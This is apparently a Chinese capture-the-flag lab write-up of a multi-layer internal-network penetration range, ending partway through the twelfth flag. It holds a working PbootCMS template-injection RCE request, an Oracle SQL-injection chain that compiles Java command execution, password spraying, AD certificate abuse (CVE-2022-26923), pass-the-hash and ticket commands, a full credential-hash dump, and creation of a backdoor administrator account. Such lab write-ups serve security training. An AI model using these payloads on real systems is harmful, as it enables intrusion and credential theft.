春秋云镜-无间计划

渗透

春秋云镜-无间计划

给了两个ip

39.99.149.38

39.99.136.220

一个是数据库

39.99.149.38:80 open
39.99.149.38:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.149.38       code:200 len:481    title:Search UserInfo

一个是PbootCMS

39.99.136.220:80 open
39.99.136.220:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.136.220      code:200 len:19781  title:PbootCMS-永久开源免费的PHP企业网站开发建设管理系统
[+] PocScan http://39.99.136.220/www.zip poc-yaml-backup-file
[+] PocScan http://39.99.136.220 poc-yaml-pbootcms-database-file-download
[+] PocScan http://39.99.136.220 poc-yaml-phpstudy-nginx-wrong-resolve php

一层网卡

flag1（PbootCMS

发现是1.3.5版本的PbootCMS，找个NDAY打一下

GET /?film=}{pboot{user:password}:if(("sy\x73\x74em")("whoami"));//)}xxx{/pboot{user:password}:if} HTTP/1.1
Host: 39.99.136.220
Accept-Encoding: gzip, deflate
Cache-Control: max-age=0
Cookie: lg=cn; PbootSystem=33r8roeqc5rr0ccqdpubd5pbgi
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Edg/136.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7

然后直接vshell上线了。

flag{Php_Waf_so_insteresting!}

flag2（oracle数据库

oracle数据库

1. 创建JAVA Source
admin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}}'';commit;end;') from dual)>1 --

2.提权
admin' AND (SELECT dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION; begin execute immediate '' begin sys.dbms_cdc_publish.create_change_set('''' a'''',''''a'''',''''a''''''''||TEST.pwn()||''''''''a'''',''''Y'''',s ysdate,sysdate);end;''; commit; end;') from dual)>1--

3.创建函数
admin' and (select dbms_xmlquery.newcontext('declare PRAGMA AUTONOMOUS_TRANSACTION;begin execute immediate ''create or replace function LINXRUNCMD(p_cmd in varchar2) return varchar2 as language java name ''''LinxUtil.runCMD(java.lang.String) return String''''; '';commit;end;') from dual)>1--

4.查询创建的函数
admin' union select null,(select object_name from all_objects where object_name ='LINXRUNCMD' and rownum=1),null from dual--

5.查询java source
admin' union select null,(select object_name from all_objects where object_name ='LinxUtil'),null from dual--

6.命令执行
admin' union select null,(select LINXRUNCMD('whoami') from dual),null from dual--

函数创建成功

是system权限，直接读flag，或者rdp上去。（我没成功过

flag{Do_you_kown_oracle_rce?}（这里有一点要注意，这个oracle是站库分离的，所以这个shell其实是oracle机器的shell而不是外网服务器的shell

flag3（172.23.4.12/172.24.7.16

./admin_linux_x64 -lport 9999

./agent_linux_x64 -rhost IP -rport PORT

内网探测

(icmp) Target 172.23.4.19     is alive
(icmp) Target 172.23.4.32     is alive
(icmp) Target 172.23.4.12     is alive
(icmp) Target 172.23.4.51     is alive
[*] Icmp alive hosts len is: 4
172.23.4.51:1521 open
172.23.4.51:445 open
172.23.4.12:445 open
172.23.4.51:139 open
172.23.4.12:139 open
172.23.4.51:135 open
172.23.4.12:135 open
172.23.4.19:80 open
172.23.4.32:80 open
172.23.4.32:22 open
172.23.4.19:22 open
[*] alive ports len is: 11
start vulscan
[*] NetInfo 
[*]172.23.4.51
   [->]iZo5dw1a7des02Z
   [->]172.23.4.51
[*] WebTitle http://172.23.4.19        code:200 len:481    title:Search UserInfo
[*] NetInfo 
[*]172.23.4.12
   [->]IZMN9U6ZO3VTRNZ
   [->]172.23.4.12
   [->]172.24.7.16
[*] NetBios 172.23.4.12     PENTEST\IZMN9U6ZO3VTRNZ       
[*] WebTitle http://172.23.4.32        code:200 len:19779  title:PbootCMS-永久开源免费的PHP企业网站开发建设管理系统
[*] NetBios 172.23.4.51     WORKGROUP\IZO5DW1A7DES02Z     
[+] PocScan http://172.23.4.32/www.zip poc-yaml-backup-file
[+] PocScan http://172.23.4.32 poc-yaml-pbootcms-database-file-download 
[+] PocScan http://172.23.4.32 poc-yaml-phpstudy-nginx-wrong-resolve php

先总结一下吧

172.23.4.19 oracle站点
172.23.4.32 PbootCMS（已拿下）
172.23.4.12 PENTEST\IZMN9U6ZO3VTRNZ
172.23.4.51 oracle数据库（已拿下）

cms机器不需要提权,oracle机器，写一个账号进去拿到一个账号密码

1 2	username: usera@pentest.me password：Admin3gv83

做一个密码喷洒

1	proxychains -q crackmapexec smb 172.23.4.0/24 -u usera -p Admin3gv83 -d pentest.me 2>/dev/null

发现能登录172.23.4.12，用这个账号登录上去：PENTEST\usera:Admin3gv83。桌面上有flag.txt

flag{not_write_password_in_txt}

flag4（oracle站点

发现usera目录下有一个.ssh，里面存了私钥，再看knowsn_hosts可以知道可能可以利用这个私钥登录172.23.4.19，并且发现这有第二个网段

直接连接就好了

1
2
3

vim yunjingkey
chmod 600 yunjingkey
proxychains -q ssh -i yunjingkey 172.23.4.19

flag{id_rsa_so_useful!}

二层网卡

flag5（DC，172.24.7.3

现在第一个网卡的四个机器都打完了，重新回到我们的172.23.4.12，这是一个双网卡的机器

先扫一下第二张网卡

172.24.7.16:445 open
172.24.7.3:135 open
172.24.7.48:445 open
172.24.7.43:445 open
172.24.7.5:445 open
172.24.7.3:445 open
172.24.7.16:135 open
172.24.7.43:139 open
172.24.7.48:139 open
172.24.7.3:139 open
172.24.7.5:139 open
172.24.7.16:139 open
172.24.7.48:135 open
172.24.7.43:135 open
172.24.7.5:135 open
172.24.7.23:80 open
172.24.7.3:80 open
172.24.7.27:22 open
172.24.7.23:22 open
172.24.7.5:88 open
172.24.7.3:88 open
172.24.7.27:8091 open
172.24.7.23:8060 open
172.24.7.27:8090 open
172.24.7.23:9094 open
[*] NetBios 172.24.7.48     PENTEST\IZAYSXE6VCUHB4Z       
[*] NetInfo 
[*]172.24.7.3
   [->]DC
   [->]172.25.12.9
   [->]172.24.7.3
[*] NetBios 172.24.7.43     PENTEST\IZMN9U6ZO3VTRPZ       
[*] NetInfo 
[*]172.24.7.48
   [->]IZAYSXE6VCUHB4Z
   [->]172.24.7.48
[*] NetInfo 
[*]172.24.7.43
   [->]IZMN9U6ZO3VTRPZ
   [->]172.24.7.43
   [->]172.26.8.12
[*] NetInfo 
[*]172.24.7.5
   [->]DCadmin
   [->]172.25.12.7
   [->]172.24.7.5
[*] WebTitle http://172.24.7.23:8060   code:404 len:555    title:404 Not Found
[*] NetBios 172.24.7.3      [+] DC:DC.pentest.me                 Windows Server 2016 Standard 14393
[*] NetBios 172.24.7.5      [+] DC:DCadmin.pen.me                Windows Server 2016 Standard 14393
[*] OsInfo 172.24.7.5    (Windows Server 2016 Standard 14393)
[*] OsInfo 172.24.7.3    (Windows Server 2016 Standard 14393)
[*] NetInfo 
[*]172.24.7.16
   [->]IZMN9U6ZO3VTRNZ
   [->]172.23.4.12
   [->]172.24.7.16
[*] WebTitle http://172.24.7.23        code:302 len:98     title:None 跳转url: http://172.24.7.23/users/sign_in
[*] WebTitle http://172.24.7.27:8091   code:204 len:0      title:None
[*] WebTitle http://172.24.7.27:8090   code:302 len:0      title:None 跳转url: http://172.24.7.27:8090/login.action?os_destination=%2Findex.action&permissionViolation=true
[*] WebTitle http://172.24.7.3         code:200 len:703    title:IIS Windows Server
[*] WebTitle http://172.24.7.23/users/sign_in code:200 len:30152  title:Sign in · GitLab
[+] PocScan http://172.24.7.3 poc-yaml-active-directory-certsrv-detect 
[+] InfoScan http://172.24.7.27:8090/login.action?os_destination=%2Findex.action&permissionViolation=true [ATLASSIAN-Confluence]

小结一下

172.24.7.16 IZMN9U6ZO3VTRNZ.pentest.me（已拿下）
172.24.7.3 DC.pentest.me
172.24.7.5 DCadmin.pen.me（另一个域控
172.24.7.23
172.24.7.27
172.24.7.43 IZMN9U6ZO3VTRPZ.pentest.me
172.24.7.48 IZAYSXE6VCUHB4Z.pentest.me

发现又是poc-yaml-active-directory-certsrv-detect，尝试过后使用CVE-2022-26923成功了。

先做一下二层代理

listen 9999

agent -rhost 172.23.4.32 -rport 9999

创建机器账号

1	proxychains4 -q certipy-ad account create -u usera@pentest.me -p Admin3gv83 -dc-ip 172.24.7.3 -user citrus -pass '123@#ABC' -dns 'DC.pentest.me'

申请机器证书（超时的话就再执行一遍

1	proxychains -q certipy-ad req -u 'citrus$@pentest.me' -p '123@#ABC' -ca 'pentest-DC-CA' -dc-ip 172.24.7.3 -template 'Machine' -debug

依旧dump域管哈希

proxychains -q certipy-ad auth -pfx dc.pfx -dc-ip 172.24.7.3

这次竟然成功了，我以为又会失败。

然后用这个哈希来dump管理员的哈希（这一步没成功的话就把dc加到hosts里面

1	proxychains -q impacket-secretsdump 'dc$@pentest.me@DC.pentest.me' -hashes :d39b575a612813527824b31d819d52a3

或者选择将证书配置到域控的RBCD，再拿银票据打PTT了

通过passthecert.py将证书配置到域控的RBCD

1 2	certipy-ad cert -pfx dc.pfx -nokey -out dc.crt certipy-ad cert -pfx dc.pfx -nocert -out dc.key

配置rbcd

1	proxychains -q python3 passthecert.py -action write_rbcd -crt dc.crt -key dc.key -domain DC.pentest.me -dc-ip 172.24.7.3 -delegate-to 'dc$' -delegate-from 'citrus$'

申请一张cifs服务的ST

1	proxychains -q impacket-getST pentest.me/'citrus$':'123@#ABC' -spn cifs/DC.pentest.me -impersonate Administrator -dc-ip 172.24.7.3

导入环境变量

1	export KRB5CCNAME=Administrator@cifs_DC.pentest.me@PENTEST.ME.ccache

PTT

1	proxychains -q python psexec.py pentest.me/administrator@DC.pentest.me -k -no-pass -target-ip 172.24.7.3 -codec gbk

flag{congratulations_get_DC!}

flag6（172.24.7.43/172.26.8.12

直接PTH

1	proxychains -q impacket-smbexec -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 pentest.me/administrator@172.24.7.43 -codec gbk

flag{Rdp_sooooooo_cool}

这里也提供一个PTTdump哈希的方法

1	proxychains python3 secretsdump.py -k -no-pass Administrator@dc.pentest.me -dc-ip 172.24.7.3

flag7（172.24.7.48

PTH

1	proxychains -q impacket-smbexec -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 pentest.me/administrator@172.24.7.48 -codec gbk

flag{relay_is_so_dangerous}

flag8（DCadmin,172.24.7.5/172.25.12.7

1	proxychains -q impacket-smbexec -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 pentest.me/administrator@172.24.7.5 -codec gbk

这不对吧，这玩意不是另一个域控吗，这也能PTH，不懂

flag{Sid_history_is_sooooo_helpful}

三层网卡

flag9（172.25.12.29

现在第二张网卡都打完了，在DCadmin上还有张网卡，继续扫内网，搭代理

再用administrator的哈希来secretsdump一下（这一步巨慢

proxychains -q python3.13 secretsdump.py pentest.me/administrator@172.24.7.5 -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 -dc-ip 172.24.7.5
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Target system bootKey: 0x54028728cd0f6f79afa4896f1d07ea85
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5c339cf871da141b43386b232f2466d0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC 
PEN\DCadmin$:aes256-cts-hmac-sha1-96:49ed032bcd0d0cb051383f3231a62695593353d0506d000f54a8461550e8500f
PEN\DCadmin$:aes128-cts-hmac-sha1-96:162e2fd3510b3dadf1d9eef7e5fa36b1
PEN\DCadmin$:des-cbc-md5:b32668d5941c6431
PEN\DCadmin$:plain_password_hex:9c504a47f882dd5a441a7251adb926c6ffe82295b68a19e01e0a1856c0cb7b0b0d3954740ce356640985525f416a65dfa13f958e637a8fc6fd3ea6f2066d3072fa8b4dd6d493d2be60ab47ad9adc5bc7f12252ff215d6005b3f696d74084da6e002c48f9bcd348714498e97070db43bd81cfb1040e6ceb50d551fe5cd823d989d3ebfd34dba8c5ce3c548e270ed0608fdfd48679ccb1c7d0cd60bb894600e3ae15266892222f562e22e53cc17d96ee1727e2697b804e0292a1aa438fc9a8cb8eaab23df69a701db22080d6d40161c0ef337ac38e1eed9834e29d8f6c01ba450f1765d18b2f7bfa5b30a37b14a2072ead
PEN\DCadmin$:aad3b435b51404eeaad3b435b51404ee:8f08cdfaef300d051593a48ee6fbbbc5:::
[*] DPAPI_SYSTEM 
dpapi_machinekey:0x8357c8f566f861b6eb62818ba431abf9ae7956ed
dpapi_userkey:0x7010dda34979af5b3b2b081aeccd6966a0b296da
[*] NL$KM 
 0000   9D 83 14 71 4B 67 2E 66  8B 36 79 E5 74 94 DF CE   ...qKg.f.6y.t...
 0010   F8 0F 28 EC 6A 7A 89 28  4F F7 D1 07 B7 9A B8 6E   ..(.jz.(O......n
 0020   14 76 A6 CC 5E 52 A4 86  86 55 3A C1 37 51 5D 87   .v..^R...U:.7Q].
 0030   3D 33 6E A7 45 EE 79 E8  89 60 CC A6 AA 98 58 EE   =3n.E.y..`....X.
NL$KM:9d8314714b672e668b3679e57494dfcef80f28ec6a7a89284ff7d107b79ab86e1476a6cc5e52a48686553ac137515d873d336ea745ee79e88960cca6aa9858ee
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
pen.me\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f91138ef5392b87416ed41cb6e810b7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:6d72190307a2b763c222714e0eebc339:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\$431000-9LF00TRKAIIC:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_21baf503acf944adb:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_86d7f51fac504d10b:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_5499dba5058d4735b:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_4969a77b2f01469cb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_3c7e4e650fe944fbb:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_823df2fc495d43cc8:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_24646eb63333484e8:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_de5632833a404141a:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\SM_3f73ae625e834c9a8:1133:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
pen.me\HealthMailbox7e80c8e:1135:aad3b435b51404eeaad3b435b51404ee:8f08861460b0c52d534c3b62ed4c5bfa:::
pen.me\HealthMailboxeda7e80:1136:aad3b435b51404eeaad3b435b51404ee:8909955538e0f56bab0a2fa7f0cc61dd:::
pen.me\HealthMailbox285895e:1137:aad3b435b51404eeaad3b435b51404ee:511c807cd8e59b000bc312255543e5fd:::
pen.me\HealthMailbox51cfeb1:1138:aad3b435b51404eeaad3b435b51404ee:f305168ff895e29d3745888c6a793002:::
pen.me\HealthMailboxc4b8425:1139:aad3b435b51404eeaad3b435b51404ee:18e23133d26cdb9739e242d8bbc34809:::
pen.me\HealthMailbox528d2e1:1140:aad3b435b51404eeaad3b435b51404ee:e4a755e4a52824dff8fbc0bdc407f72b:::
pen.me\HealthMailboxc5e00fd:1141:aad3b435b51404eeaad3b435b51404ee:08333ec70b3f1f6a0d1d72d96e3d04b6:::
pen.me\HealthMailboxee2d866:1142:aad3b435b51404eeaad3b435b51404ee:ef20a63fe85c29209f1e248370968513:::
pen.me\HealthMailbox190d1f5:1143:aad3b435b51404eeaad3b435b51404ee:bbac9374b2dda3615fbfc262489839ab:::
pen.me\HealthMailbox45dde9b:1144:aad3b435b51404eeaad3b435b51404ee:dcb96076b068d0a73b2e1adbd23a1bd2:::
pen.me\HealthMailboxbb65e08:1145:aad3b435b51404eeaad3b435b51404ee:f3839bb82cf1c86713244f7e72623607:::
pen.me\userd:1146:aad3b435b51404eeaad3b435b51404ee:b8e52066381b9c3d08d8661a0c0d5a72:::
pen.me\exchange:1148:aad3b435b51404eeaad3b435b51404ee:21a43bd74a20a330ef77a4e7bd179d8c:::
fffffilm:1150:aad3b435b51404eeaad3b435b51404ee:ad123012e39b20a80ebe424bff56e1b4:::
DCADMIN$:1000:aad3b435b51404eeaad3b435b51404ee:8f08cdfaef300d051593a48ee6fbbbc5:::
IZ1TUCEKFDPCEMZ$:1104:aad3b435b51404eeaad3b435b51404ee:cdb7464079c335ed60cba670ff92a316:::
IZ88QYK8Y8Y3VXZ$:1147:aad3b435b51404eeaad3b435b51404ee:ab534674faebfe2a22f49b0b3cfe2e20:::
PENTEST$:1149:aad3b435b51404eeaad3b435b51404ee:76a8097ecde98c39bde85bbc63dcb7d6:::
[*] Kerberos keys grabbed
pen.me\Administrator:aes256-cts-hmac-sha1-96:aa003d0f53e6c5a8dd28e22b4e6b87340151d230f223f8e156c333bb59c65644
pen.me\Administrator:aes128-cts-hmac-sha1-96:dc24b2b0b854a4decd23582da613919e
pen.me\Administrator:des-cbc-md5:e368d962bacbe097
krbtgt:aes256-cts-hmac-sha1-96:3a72075a3affbc661707a01cf93dcd845ed669978279ff7af2173543a5bd5b7a
krbtgt:aes128-cts-hmac-sha1-96:77fd505df070d3422cd1a19108420d8b
krbtgt:des-cbc-md5:1cfd7fe69498c48f
pen.me\HealthMailbox7e80c8e:aes256-cts-hmac-sha1-96:99ce344bcded750eb316d9855f77df94470e94a3232d1cd9be25bb57c81a2686
pen.me\HealthMailbox7e80c8e:aes128-cts-hmac-sha1-96:15825bd25d717a9ca440f6236337bf58
pen.me\HealthMailbox7e80c8e:des-cbc-md5:6e8f98bff8310219
pen.me\HealthMailboxeda7e80:aes256-cts-hmac-sha1-96:0cb3f6120c5c75694fab18936c2f6daf5a6b91500d81e7cee66c5625dda399ce
pen.me\HealthMailboxeda7e80:aes128-cts-hmac-sha1-96:000f9d87c0eb7edec69500264117e4c6
pen.me\HealthMailboxeda7e80:des-cbc-md5:1308e9f87a5d3b86
pen.me\HealthMailbox285895e:aes256-cts-hmac-sha1-96:ca046e53700796fb14d1e6ac6be9b731749db13155ebaa9fc8bf849ec2a741a6
pen.me\HealthMailbox285895e:aes128-cts-hmac-sha1-96:e21f515b3a570a2d7a34fc07a395d5eb
pen.me\HealthMailbox285895e:des-cbc-md5:57c801673ed0bfd9
pen.me\HealthMailbox51cfeb1:aes256-cts-hmac-sha1-96:44b6bbb662ae92da5efc1c89374b36715ff30ec7573c02b008754661d3a2d0f8
pen.me\HealthMailbox51cfeb1:aes128-cts-hmac-sha1-96:b95a8c3c49a94ff83da78e2b45592f97
pen.me\HealthMailbox51cfeb1:des-cbc-md5:e367548ca2e6e58c
pen.me\HealthMailboxc4b8425:aes256-cts-hmac-sha1-96:bc5465a163df0842aa0626b16144a8e518cbebfa2dc2a3154d26c41c8e4ac53c
pen.me\HealthMailboxc4b8425:aes128-cts-hmac-sha1-96:4108c2df675446b290742916b3b9ec32
pen.me\HealthMailboxc4b8425:des-cbc-md5:61b031f194f2c1dc
pen.me\HealthMailbox528d2e1:aes256-cts-hmac-sha1-96:3726249220638dccab3ea5c39bd5bd2f41cb21a24e3679d5f72f64a4f4ac81a5
pen.me\HealthMailbox528d2e1:aes128-cts-hmac-sha1-96:5e79c4d2f9ec7d72aca8cbe84f73d0f9
pen.me\HealthMailbox528d2e1:des-cbc-md5:8370d352f2169b4f
pen.me\HealthMailboxc5e00fd:aes256-cts-hmac-sha1-96:bd7b3c2a7d0379ed713252195380ee07612cb1727ff2eb1921898ba265e5a7cc
pen.me\HealthMailboxc5e00fd:aes128-cts-hmac-sha1-96:d3b39c0815d4b99e6c9bdcf384214d10
pen.me\HealthMailboxc5e00fd:des-cbc-md5:3eaedaea9b4cdfc1
pen.me\HealthMailboxee2d866:aes256-cts-hmac-sha1-96:f8102e19d48a7c029c6c95ffe70e801386c9e2719dee3c935c3c27d78ba1b4c6
pen.me\HealthMailboxee2d866:aes128-cts-hmac-sha1-96:ffe40245591c77b6421734360c4ff665
pen.me\HealthMailboxee2d866:des-cbc-md5:022649d6c2d979ab
pen.me\HealthMailbox190d1f5:aes256-cts-hmac-sha1-96:ad9e44a57f30926c0f68a38151b2bcf09d54945d09867a7a1824a475a90712f4
pen.me\HealthMailbox190d1f5:aes128-cts-hmac-sha1-96:06988d81ef1af625370abee3885d9e71
pen.me\HealthMailbox190d1f5:des-cbc-md5:1394a81661fddf04
pen.me\HealthMailbox45dde9b:aes256-cts-hmac-sha1-96:7428e94c5b087cb520e2d653c79c3a06f0d4f3d041a5f6a3678f145df40ed692
pen.me\HealthMailbox45dde9b:aes128-cts-hmac-sha1-96:f5be9c837cedac4b1b856e4c3da44bff
pen.me\HealthMailbox45dde9b:des-cbc-md5:adabeca7e6a71a8c
pen.me\HealthMailboxbb65e08:aes256-cts-hmac-sha1-96:6db909d2c5457125a4cd0720408cc6057919c89f20afedd18dcacbeb72ab9f98
pen.me\HealthMailboxbb65e08:aes128-cts-hmac-sha1-96:13ae7b3b85d8374cb7ecf705ea5609c6
pen.me\HealthMailboxbb65e08:des-cbc-md5:8fa7fbe9645df11c
pen.me\userd:aes256-cts-hmac-sha1-96:516fcce3511871af4239e3cfd61f23fbb3ae2cbe2d3417b080f2cdd72d03ce3d
pen.me\userd:aes128-cts-hmac-sha1-96:fc0ffc27c1ab4185739f9e18dbfd6383
pen.me\userd:des-cbc-md5:a45726a79ba8bc2f
pen.me\exchange:aes256-cts-hmac-sha1-96:f265e64d7428db55e4d423ec80776c2bc05476696db7a730b223e8e768b8ee25
pen.me\exchange:aes128-cts-hmac-sha1-96:9d27741e522e2050487c1a224ab56b53
pen.me\exchange:des-cbc-md5:51f4d9a820f46129
fffffilm:aes256-cts-hmac-sha1-96:208bfc0694a21d9f0752fd4b13e1ecf38bd3ffc66ab78a3232532eb8850253e1
fffffilm:aes128-cts-hmac-sha1-96:ed064bfdaf80cca077601cd3a02c5ebd
fffffilm:des-cbc-md5:1c6e403725250870
DCADMIN$:aes256-cts-hmac-sha1-96:49ed032bcd0d0cb051383f3231a62695593353d0506d000f54a8461550e8500f
DCADMIN$:aes128-cts-hmac-sha1-96:162e2fd3510b3dadf1d9eef7e5fa36b1
DCADMIN$:des-cbc-md5:13510dbf68c4d9a1
IZ1TUCEKFDPCEMZ$:aes256-cts-hmac-sha1-96:b7e7afe1327642325f73025556470321682e7660aa59b343d17040c8a2a62d51
IZ1TUCEKFDPCEMZ$:aes128-cts-hmac-sha1-96:5369e79b412a8e5b9e5250f8f5ff3bd1
IZ1TUCEKFDPCEMZ$:des-cbc-md5:2c254315c123da49
IZ88QYK8Y8Y3VXZ$:aes256-cts-hmac-sha1-96:cdd1740f4a5b6376677cf34935913abf0e7820dfbc24393975b8ad1076919231
IZ88QYK8Y8Y3VXZ$:aes128-cts-hmac-sha1-96:7ab68d2dec5662589f0aab22c1655e28
IZ88QYK8Y8Y3VXZ$:des-cbc-md5:d0c1c7d652d6c137
PENTEST$:aes256-cts-hmac-sha1-96:9e88acd10fce2745df86e929cf8edf006986f871208880edc943a7c1cce6a1ae
PENTEST$:aes128-cts-hmac-sha1-96:ef68bb49005b87919219232cb235192f
PENTEST$:des-cbc-md5:68e3706e9867b91a

记下这两个哈希

1 2	pen.me\Administrator:500:aad3b435b51404eeaad3b435b51404ee:0f91138ef5392b87416ed41cb6e810b7::: pen.me\exchange:1148:aad3b435b51404eeaad3b435b51404ee:21a43bd74a20a330ef77a4e7bd179d8c:::

然后利用PTH先加一个管理员用户

1	proxychains -q impacket-smbexec -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 pentest.me/administrator@172.24.7.5 -codec gbk

然后

1 2	net user fffffilm Password@973 /add net localgroup administrators fffffilm /add

rdp上去扫内网

172.25.12.7:445 open
172.25.12.7:139 open
172.25.12.7:135 open
172.25.12.7:88 open
[*] OsInfo 172.25.12.7    (Windows Server 2016 Standard 14393)
[*] NetInfo 
[*]172.25.12.7
   [->]DCadmin
   [->]172.25.12.7
   [->]172.24.7.5
172.25.12.19:808 open
172.25.12.9:88 open
172.25.12.7:88 open
172.25.12.9:445 open
172.25.12.19:445 open
172.25.12.29:445 open
172.25.12.7:445 open
172.25.12.19:443 open
172.25.12.9:139 open
172.25.12.19:139 open
172.25.12.29:139 open
172.25.12.9:135 open
172.25.12.7:139 open
172.25.12.19:135 open
172.25.12.29:135 open
172.25.12.7:135 open
172.25.12.19:81 open
172.25.12.9:80 open
172.25.12.19:80 open
172.25.12.19:8172 open
[*] OsInfo 172.25.12.7    (Windows Server 2016 Standard 14393)
[*] NetInfo 
[*]172.25.12.19
   [->]IZ1TUCEKFDPCEMZ
   [->]172.25.12.19
[*] NetInfo 
[*]172.25.12.29
   [->]IZ88QYK8Y8Y3VXZ
   [->]172.25.12.29
[*] NetInfo 
[*]172.25.12.9
   [->]DC
   [->]172.25.12.9
   [->]172.24.7.3
[*] NetBios 172.25.12.29    PEN\IZ88QYK8Y8Y3VXZ           
[*] NetInfo 
[*]172.25.12.7
   [->]DCadmin
   [->]172.25.12.7
   [->]172.24.7.5
[*] NetBios 172.25.12.9     [+] DC:DC.pentest.me                 Windows Server 2016 Standard 14393
[*] NetBios 172.25.12.19    IZ1TUCEKFDPCEMZ.pen.me              Windows Server 2016 Datacenter 14393
[*] OsInfo 172.25.12.9    (Windows Server 2016 Standard 14393)
[*] WebTitle http://172.25.12.19:81    code:403 len:1157   title:403 - 禁止访问: 访问被拒绝。
[*] WebTitle http://172.25.12.9        code:200 len:703    title:IIS Windows Server
[+] PocScan http://172.25.12.9 poc-yaml-active-directory-certsrv-detect 
[*] WebTitle https://172.25.12.19:8172 code:404 len:0      title:None
[*] WebTitle http://172.25.12.19       code:403 len:0      title:None
[*] WebTitle https://172.25.12.19      code:302 len:0      title:None 跳转url: https://172.25.12.19/owa/
[*] WebTitle https://172.25.12.19/owa/auth/logon.aspx?url=https%3a%2f%2f172.25.12.19%2fowa%2f&reason=0 code:200 len:28242  title:Outlook

做代理

listen 9999
agent -rhost 172.24.7.16 -rport 9999

拿到哈希继续PTH

1
2
3

proxychains python wmiexec.py pen.me/administrator@172.25.12.29 -hashes :0f91138ef5392b87416ed41cb6e810b7 -codec gbk

proxychains impacket-smbexec -hashes :0f91138ef5392b87416ed41cb6e810b7 pen.me/administrator@172.25.12.29 -codec gbk

flag{Group_Policy!s}

flag10（172.25.12.19

继续PTH，19这台机子总起不来不知道为什么（第一次起来了，但没打到PTH这里，后面又开了几次都没起来，实在舍不得沙砾了就不打了了，反正也就一个PTH读flag，然后rdp上去拿邮件再拿flag就行了。

1	proxychains impacket-smbexec -hashes :0f91138ef5392b87416ed41cb6e810b7 pen.me/administrator@172.25.12.19 -codec gbk

flag{Dc_Administrator_can_do_anything!}

flag11（172.25.12.19

看邮件就好了，用exchange用户看邮件就行

1	proxychains -q python pthexchange.py --target http://172.25.12.19/ --username exchange --password '00000000000000000000000000000000:21a43bd74a20a330ef77a4e7bd179d8c' --action Download

flag{Exchange_have_so_many_things}

flag12（172.26.8.16

172.24.7.23上有个Confluence，使用这个登录成功:usera:Admin3gv83

可以拿到一个execl表

172.24.7.23上有个gitlab，并且存在账号复用

1 2	echo 'grant_type=password&username=usera&password=Admin3gv83' > auth.txt proxychains -q curl --data "@auth.txt" --request POST http://172.24.7.23/oauth/token

得到

{"access_token":"a40510f126e0e767a4fe1062e1d5fbae84d8a0c335da8f2fe3f8b3f1af86cf23","token_type":"Bearer","expires_in":7200,"refresh_token":"8ad4a95ff4e5704a9eb567ee4a7255fea3c1000af30501b3eed676f1394539fd","scope":"api","created_at":1748079786}

再执行

1	proxychains -q curl --header "Authorization: Bearer a40510f126e0e767a4fe1062e1d5fbae84d8a0c335da8f2fe3f8b3f1af86cf23" http://172.24.7.23/api/v4/users \| jq

可以知道一共只有三个有效用户，luzizhuo、usera和root，用luzizhuo登录进入gitlab，有一个私人项目叫 Financial system-demo，找到commit记录信息：

1
2
3

IP: 172.26.8.16
username: sa
password: sqlserver_2022

利用smbclient上传文件

proxychains python3 smbclient.py -hashes :5d0f79eaf7a6c0ad70bcfce6522d2da1 pentest.me/administrator@172.24.7.43

# shares
ADMIN$
C$
IPC$
# use C$
# pwd
/
# put fscan.exe
# put agent.exe
# ls
......
